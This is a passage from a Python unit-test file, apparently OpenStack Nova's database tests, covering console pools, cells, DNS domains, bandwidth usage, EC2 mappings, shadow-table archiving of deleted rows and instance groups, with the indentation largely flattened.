columns_to_join=['pool'])
self._assertEqualListsOfObjects(self.consoles, consoles_get,
ignored_keys=['pool'])
        self._assertEqualListsOfObjects(self.console_pools,
                                        [c['pool'] for c in consoles_get])
def test_console_get_all_by_instance_empty(self):
consoles_get = db.console_get_all_by_instance(self.ctxt,
uuidutils.generate_uuid())
self.assertEqual(consoles_get, [])
def test_console_delete(self):
console_id = self.consoles[0]['id']
db.console_delete(self.ctxt, console_id)
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, console_id)
def test_console_get_by_pool_instance_not_found(self):
self.assertRaises(exception.ConsoleNotFoundInPoolForInstance,
db.console_get_by_pool_instance, self.ctxt,
self.consoles[0]['pool_id'],
uuidutils.generate_uuid())
def test_console_get_not_found(self):
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, 100500)
def test_console_get_not_found_instance(self):
self.assertRaises(exception.ConsoleNotFoundForInstance, db.console_get,
self.ctxt, self.consoles[0]['id'],
uuidutils.generate_uuid())
class CellTestCase(test.TestCase, ModelsObjectComparatorMixin):
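    """Tests for db.api.cell_* methods."""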
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(CellTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_cell_base_values(self):
return {
'name': 'myname',
'api_url': 'apiurl',
'transport_url': 'transporturl',
'weight_offset': 0.5,
'weight_scale': 1.5,
'is_parent': True,
}
def _cell_value_modify(self, value, step):
if isinstance(value, str):
return value + str(step)
elif isinstance(value, float):
return value + step + 0.6
elif isinstance(value, bool):
return bool(step % 2)
elif isinstance(value, int):
return value + step
def _create_cells(self):
test_values = []
for x in range(1, 4):
modified_val = {k: self._cell_value_modify(v, x)
for k, v in self._get_cell_base_values().items()}
db.cell_create(self.ctxt, modified_val)
test_values.append(modified_val)
return test_values
def test_cell_create(self):
cell = db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertIsNotNone(cell['id'])
self._assertEqualObjects(cell, self._get_cell_base_values(),
ignored_keys=self._ignored_keys)
def test_cell_update(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
new_values = {
'api_url': 'apiurl1',
'transport_url': 'transporturl1',
'weight_offset': 0.6,
'weight_scale': 1.6,
'is_parent': False,
}
test_cellname = self._get_cell_base_values()['name']
updated_cell = db.cell_update(self.ctxt, test_cellname, new_values)
self._assertEqualObjects(updated_cell, new_values,
ignored_keys=self._ignored_keys + ['name'])
def test_cell_delete(self):
new_cells = self._create_cells()
for cell in new_cells:
test_cellname = cell['name']
db.cell_delete(self.ctxt, test_cellname)
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
test_cellname)
def test_cell_get(self):
new_cells = self._create_cells()
for cell in new_cells:
cell_get = db.cell_get(self.ctxt, cell['name'])
self._assertEqualObjects(cell_get, cell,
ignored_keys=self._ignored_keys)
def test_cell_get_all(self):
new_cells = self._create_cells()
cells = db.cell_get_all(self.ctxt)
self.assertEqual(len(new_cells), len(cells))
cells_byname = {newcell['name']: newcell
for newcell in new_cells}
for cell in cells:
self._assertEqualObjects(cell, cells_byname[cell['name']],
self._ignored_keys)
def test_cell_get_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
'cellnotinbase')
def test_cell_update_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_update, self.ctxt,
'cellnotinbase', self._get_cell_base_values())
def test_cell_create_exists(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertRaises(exception.CellExists, db.cell_create,
self.ctxt, self._get_cell_base_values())
class ConsolePoolTestCase(test.TestCase, ModelsObjectComparatorMixin):
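    """Tests for db.api.console_pool_* methods."""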
def setUp(self):
super(ConsolePoolTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.test_console_pool_1 = {
'address': '192.168.2.10',
'username': 'user_1',
'password': 'secret_123',
'console_type': 'type_1',
'public_hostname': 'public_hostname_123',
'host': 'localhost',
'compute_host': '127.0.0.1',
}
self.test_console_pool_2 = {
'address': '192.168.2.11',
'username': 'user_2',
'password': 'secret_1234',
'console_type': 'type_2',
'public_hostname': 'public_hostname_1234',
'host': '127.0.0.1',
'compute_host': 'localhost',
}
self.test_console_pool_3 = {
'address': '192.168.2.12',
'username': 'user_3',
'password': 'secret_12345',
'console_type': 'type_2',
'public_hostname': 'public_hostname_12345',
'host': '127.0.0.1',
'compute_host': '192.168.1.1',
}
def test_console_pool_create(self):
console_pool = db.console_pool_create(
self.ctxt, self.test_console_pool_1)
self.assertIsNotNone(console_pool.get('id'))
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(
console_pool, self.test_console_pool_1, ignored_keys)
def test_console_pool_create_duplicate(self):
db.console_pool_create(self.ctxt, self.test_console_pool_1)
self.assertRaises(exception.ConsolePoolExists, db.console_pool_create,
self.ctxt, self.test_console_pool_1)
def test_console_pool_get_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_1
db_cp = db.console_pool_get_by_host_type(
self.ctxt, cp['compute_host'], cp['host'], cp['console_type']
)
self._assertEqualObjects(cp, db_cp, ignored_keys)
    def test_console_pool_get_by_host_type_no_results(self):
self.assertRaises(
exception.ConsolePoolNotFoundForHostType,
db.console_pool_get_by_host_type, self.ctxt, 'compute_host',
'host', 'console_type')
def test_console_pool_get_all_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
self.test_console_pool_3,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_2
db_cp = db.console_pool_get_all_by_host_type(
self.ctxt, cp['host'], cp['console_type'])
self._assertEqualListsOfObjects(
db_cp, [self.test_console_pool_2, self.test_console_pool_3],
ignored_keys)
def test_console_pool_get_all_by_host_type_no_results(self):
res = db.console_pool_get_all_by_host_type(
self.ctxt, 'cp_host', 'cp_console_type')
self.assertEqual([], res)
class DnsdomainTestCase(test.TestCase):
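    """Tests for db.api.dnsdomain_* methods."""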
def setUp(self):
super(DnsdomainTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.domain = 'test.domain'
self.testzone = 'testzone'
self.project = 'fake'
def test_dnsdomain_register_for_zone(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['availability_zone'], self.testzone)
self.assertEqual(domain['scope'], 'private')
def test_dnsdomain_register_for_project(self):
db.dnsdomain_register_for_project(self.ctxt, self.domain, self.project)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['project_id'], self.project)
self.assertEqual(domain['scope'], 'public')
def test_dnsdomain_unregister(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
db.dnsdomain_unregister(self.ctxt, self.domain)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertIsNone(domain)
def test_dnsdomain_get_all(self):
d_list = ['test.domain.one', 'test.domain.two']
db.dnsdomain_register_for_zone(self.ctxt, d_list[0], 'zone')
db.dnsdomain_register_for_zone(self.ctxt, d_list[1], 'zone')
db_list = db.dnsdomain_get_all(self.ctxt)
db_domain_list = [d.domain for d in db_list]
self.assertEqual(sorted(d_list), sorted(db_domain_list))
class BwUsageTestCase(test.TestCase, ModelsObjectComparatorMixin):
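    """Tests for db.api.bw_usage_* methods."""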
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(BwUsageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.useFixture(test.TimeOverride())
def test_bw_usage_get_by_uuids(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
start_period_str = timeutils.strtime(start_period)
uuid3_refreshed = now - datetime.timedelta(seconds=5)
uuid3_refreshed_str = timeutils.strtime(uuid3_refreshed)
expected_bw_usages = {
'fake_uuid1': {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now},
'fake_uuid2': {'uuid': 'fake_uuid2',
'mac': 'fake_mac2',
'start_period': start_period,
'bw_in': 200,
'bw_out': 300,
'last_ctr_in': 22345,
'last_ctr_out': 77890,
'last_refreshed': now},
'fake_uuid3': {'uuid': 'fake_uuid3',
'mac': 'fake_mac3',
'start_period': start_period,
'bw_in': 400,
'bw_out': 500,
'last_ctr_in': 32345,
'last_ctr_out': 87890,
'last_refreshed': uuid3_refreshed}
}
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2'], start_period_str)
# No matches
self.assertEqual(len(bw_usages), 0)
# Add 3 entries
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period_str,
100, 200, 12345, 67890)
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period_str,
100, 200, 42, 42)
# Test explicit refreshed time
db.bw_usage_update(self.ctxt, 'fake_uuid3',
'fake_mac3', start_period_str,
400, 500, 32345, 87890,
last_refreshed=uuid3_refreshed_str)
# Update 2nd entry
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period_str,
200, 300, 22345, 77890)
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2', 'fake_uuid3'], start_period_str)
self.assertEqual(len(bw_usages), 3)
for usage in bw_usages:
self._assertEqualObjects(expected_bw_usages[usage['uuid']], usage,
ignored_keys=self._ignored_keys)
def test_bw_usage_get(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
start_period_str = timeutils.strtime(start_period)
expected_bw_usage = {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now}
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period_str,
'fake_mac1')
self.assertIsNone(bw_usage)
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period_str,
100, 200, 12345, 67890)
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period_str,
'fake_mac1')
self._assertEqualObjects(expected_bw_usage, bw_usage,
ignored_keys=self._ignored_keys)
class Ec2TestCase(test.TestCase):
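    """Tests for db.api.ec2_* methods."""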
def setUp(self):
super(Ec2TestCase, self).setUp()
self.ctxt = context.RequestContext('fake_user', 'fake_project')
def test_ec2_ids_not_found_are_printable(self):
def check_exc_format(method, value):
try:
method(self.ctxt, value)
except exception.NotFound as exc:
self.assertIn(six.text_type(value), six.text_type(exc))
check_exc_format(db.get_instance_uuid_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_uuid, 'fake')
def test_ec2_volume_create(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(vol['id'])
self.assertEqual(vol['uuid'], 'fake-uuid')
def test_ec2_volume_get_by_id(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_id(self.ctxt, vol['id'])
self.assertEqual(vol2['uuid'], vol['uuid'])
def test_ec2_volume_get_by_uuid(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_uuid(self.ctxt, vol['uuid'])
self.assertEqual(vol2['id'], vol['id'])
def test_ec2_snapshot_create(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(snap['id'])
self.assertEqual(snap['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_ec2_id(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_ec2_id(self.ctxt, snap['id'])
self.assertEqual(snap2['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_uuid(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(snap['id'], snap2['id'])
def test_ec2_snapshot_get_by_ec2_id_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_ec2_id,
self.ctxt, 123456)
def test_ec2_snapshot_get_by_uuid_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_uuid,
self.ctxt, 'fake-uuid')
def test_ec2_instance_create(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(inst['id'])
self.assertEqual(inst['uuid'], 'fake-uuid')
def test_ec2_instance_get_by_uuid(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_id(self.ctxt, inst['id'])
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_uuid_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 'uuid-not-present')
def test_ec2_instance_get_by_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 12345)
def test_get_instance_uuid_by_ec2_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst_uuid = db.get_instance_uuid_by_ec2_id(self.ctxt, inst['id'])
self.assertEqual(inst_uuid, 'fake-uuid')
def test_get_instance_uuid_by_ec2_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.get_instance_uuid_by_ec2_id,
self.ctxt, 100500)
class ArchiveTestCase(test.TestCase):
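    """Tests for db.archive_deleted_rows* methods and the shadow tables."""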
def setUp(self):
super(ArchiveTestCase, self).setUp()
self.context = context.get_admin_context()
self.engine = get_engine()
self.conn = self.engine.connect()
self.instance_id_mappings = models.InstanceIdMapping.__table__
self.shadow_instance_id_mappings = sqlalchemyutils.get_table(
self.engine, "shadow_instance_id_mappings")
self.dns_domains = models.DNSDomain.__table__
self.shadow_dns_domains = sqlalchemyutils.get_table(
self.engine, "shadow_dns_domains")
self.consoles = models.Console.__table__
self.shadow_consoles = sqlalchemyutils.get_table(
self.engine, "shadow_consoles")
self.console_pools = models.ConsolePool.__table__
self.shadow_console_pools = sqlalchemyutils.get_table(
self.engine, "shadow_console_pools")
self.instances = models.Instance.__table__
self.shadow_instances = sqlalchemyutils.get_table(
self.engine, "shadow_instances")
self.uuidstrs = []
for _ in range(6):
self.uuidstrs.append(stdlib_uuid.uuid4().hex)
def _assert_shadow_tables_empty_except(self, *exceptions):
"""Ensure shadow tables are empty
This method ensures that all the shadow tables in the schema,
        except for specifically named exceptions, are empty. This
makes sure that archiving isn't moving unexpected content.
"""
metadata = MetaData(bind=self.engine)
metadata.reflect()
for table in metadata.tables:
if table.startswith("shadow_") and table not in exceptions:
rows = self.conn.execute("select * from %s" % table).fetchall()
self.assertEqual(rows, [], "Table %s not empty" % table)
def test_shadow_tables(self):
metadata = MetaData(bind=self.engine)
metadata.reflect()
for table_name in metadata.tables:
            # NOTE(rpodolyaka): migration 209 introduced a few new tables,
            #                   which don't have shadow tables, and that's
            #                   completely OK, so we should skip them here
if table_name.startswith("dump_"):
continue
            # NOTE(snikitin): migration 266 introduced a new table 'tags',
            #                 which has no shadow table and that's
            #                 completely OK, so we should skip it here
if table_name == 'tags':
continue
if table_name.startswith("shadow_"):
self.assertIn(table_name[7:], metadata.tables)
continue
self.assertTrue(db_utils.check_shadow_table(self.engine,
table_name))
self._assert_shadow_tables_empty_except()
def test_archive_deleted_rows(self):
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
# Set 4 to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
        qiim = sql.select([self.instance_id_mappings]).where(
            self.instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 4 left in main
self.assertEqual(len(rows), 4)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 2 in shadow
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 4 in shadow
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we still have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we still have 4 in shadow
self.assertEqual(len(rows), 4)
# Ensure only deleted rows were deleted
self._assert_shadow_tables_empty_except(
'shadow_instance_id_mappings')
def test_archive_deleted_rows_for_every_uuid_table(self):
tablenames = []
for model_class in six.itervalues(models.__dict__):
if hasattr(model_class, "__tablename__"):
tablenames.append(model_class.__tablename__)
tablenames.sort()
for tablename in tablenames:
self._test_archive_deleted_rows_for_one_uuid_table(tablename)
def _test_archive_deleted_rows_for_one_uuid_table(self, tablename):
""":returns: 0 on success, 1 if no uuid column, 2 if insert failed."""
main_table = sqlalchemyutils.get_table(self.engine, tablename)
if not hasattr(main_table.c, "uuid"):
# Not a uuid table, so skip it.
return 1
shadow_table = sqlalchemyutils.get_table(
self.engine, "shadow_" + tablename)
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = main_table.insert().values(uuid=uuidstr)
try:
self.conn.execute(ins_stmt)
except (db_exc.DBError, OperationalError):
# This table has constraints that require a table-specific
# insert, so skip it.
return 2
# Set 4 to deleted
update_statement = main_table.update().\
where(main_table.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
qmt = sql.select([main_table]).where(main_table.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qmt).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qst = sql.select([shadow_table]).\
where(shadow_table.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qst).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 4 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 4)
# Verify we have 2 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we still have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we still have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
return 0
def test_archive_deleted_rows_no_id_column(self):
uuidstr0 = self.uuidstrs[0]
ins_stmt = self.dns_domains.insert().values(domain=uuidstr0)
self.conn.execute(ins_stmt)
update_statement = self.dns_domains.update().\
where(self.dns_domains.c.domain == uuidstr0).\
values(deleted=True)
self.conn.execute(update_statement)
qdd = sql.select([self.dns_domains], self.dns_domains.c.domain ==
uuidstr0)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 1)
qsdd = sql.select([self.shadow_dns_domains],
self.shadow_dns_domains.c.domain == uuidstr0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 0)
db.archive_deleted_rows(self.context, max_rows=1)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 1)
self._assert_shadow_tables_empty_except(
'shadow_dns_domains',
)
def test_archive_deleted_rows_fk_constraint(self):
# consoles.pool_id depends on console_pools.id
# SQLite doesn't enforce foreign key constraints without a pragma.
dialect = self.engine.url.get_dialect()
if dialect == sqlite.dialect:
            # We're seeing issues with foreign key support in SQLite 3.6.20.
            # SQLAlchemy doesn't support it at all with SQLite < 3.6.19,
            # but it works fine in SQLite 3.7.
            # So skip this test early if running SQLite < 3.7.
import sqlite3
tup = sqlite3.sqlite_version_info
if tup[0] < 3 or (tup[0] == 3 and tup[1] < 7):
self.skipTest(
'sqlite version too old for reliable SQLA foreign_keys')
self.conn.execute("PRAGMA foreign_keys = ON")
ins_stmt = self.console_pools.insert().values(deleted=1)
result = self.conn.execute(ins_stmt)
id1 = result.inserted_primary_key[0]
ins_stmt = self.consoles.insert().values(deleted=1,
pool_id=id1)
result = self.conn.execute(ins_stmt)
result.inserted_primary_key[0]
# The first try to archive console_pools should fail, due to FK.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 0)
# Then archiving consoles should work.
num = db.archive_deleted_rows_for_table(self.context, "consoles")
self.assertEqual(num, 1)
# Then archiving console_pools should work.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 1)
self._assert_shadow_tables_empty_except(
'shadow_console_pools',
'shadow_consoles'
)
def test_archive_deleted_rows_2_tables(self):
# Add 6 rows to each table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
ins_stmt2 = self.instances.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt2)
# Set 4 of each to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
update_statement2 = self.instances.update().\
where(self.instances.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement2)
# Verify we have 6 in each main table
qiim = sql.select([self.instance_id_mappings]).where(
self.instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
self.assertEqual(len(rows), 6)
qi = sql.select([self.instances]).where(self.instances.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(rows), 6)
# Verify we have 0 in each shadow table
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
self.assertEqual(len(rows), 0)
qsi = sql.select([self.shadow_instances]).\
where(self.shadow_instances.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(rows), 0)
# Archive 7 rows, which should be 4 in one table and 3 in the other.
db.archive_deleted_rows(self.context, max_rows=7)
# Verify we have 5 left in the two main tables combined
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 5)
# Verify we have 7 in the two shadow tables combined.
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 7)
# Archive the remaining deleted rows.
db.archive_deleted_rows(self.context, max_rows=1)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=500)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
self._assert_shadow_tables_empty_except(
'shadow_instances',
'shadow_instance_id_mappings'
)
class InstanceGroupDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(InstanceGroupDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
def _get_default_values(self):
return {'name': 'fake_name',
'user_id': self.user_id,
'project_id': self.project_id}
def _create_instance_group(self, context, values, policies=None,
members=None):
return db.instance_group_create(context, values, policies=policies,
members=members)
def test_instance_group_create_no_key(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
def test_instance_group_create_with_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
def test_instance_group_create_with_same_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
self._create_instance_group(self.context, values)
self.assertRaises(exception.InstanceGroupIdExists,
self._create_instance_group, self.context, values)
def test_instance_group_get(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
result2 = db.instance_group_get(self.context, result1['uuid'])
self._assertEqualObjects(result1, result2)
def test_instance_group_update_simple(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
values = {'name': 'new_name', 'user_id': 'new_user',
'project_id': 'new_project'}
db.instance_group_update(self.context, result1['uuid'],
values)
result2 = db.instance_group_get(self.context, result1['uuid'])
self.assertEqual(result1['uuid'], result2['uuid'])
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result2, values, ignored_keys)
def test_instance_group_delete(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
db.instance_group_delete(self.context, result['uuid'])
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete, self.context,
result['uuid'])
def test_instance_group_get_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_get,
self.context,
'nonexistent')
def test_instance_group_delete_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete,
self.context,
'nonexistent')
def test_instance_group_get_all(self):
groups = db.instance_group_get_all(self.context)
self.assertEqual(0, len(groups))
value = self._get_default_values()
result1 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
self.assertEqual(1, len(groups))
value = self._get_default_values()
result2 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
def test_instance_group_get_all_by_project_id(self):
groups = db.instance_group_get_all_by_project_id(self.context,
'invalid_project_id')
self.assertEqual(0, len(groups))
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all_by_project_id(self.context,
'fake_project')
self.assertEqual(1, len(groups))
values = self._get_default_values()
values['project_id'] = 'new_project_id'
result2 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
projects = [{'name': 'fake_project', 'value': [result1]},
{'name': 'new_project_id', 'value': [result2]}]
for project in projects:
groups = db.instance_group_get_all_by_project_id(self.context,
project['name'])
self._assertEqualListsOfObjects(project['value'], groups)
def test_instance_group_update(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
id = result['uuid']
values = self._get_default_values()
values['name'] = 'new_fake_name'
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self.assertEqual(result['name'], 'new_fake_name')
# update members
values = self._get_default_values()
members = ['instance_id1', 'instance_id2']
values['members'] = members
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
# update policies
values = self._get_default_values()
policies = ['policy1', 'policy2']
values['policies'] = policies
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
# test invalid ID
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_update, self.context,
'invalid_id', values)
def test_instance_group_get_by_instance(self):
values = self._get_default_values()
group1 = self._create_instance_group(self.context, values)
members = ['instance_id1', 'instance_id2']
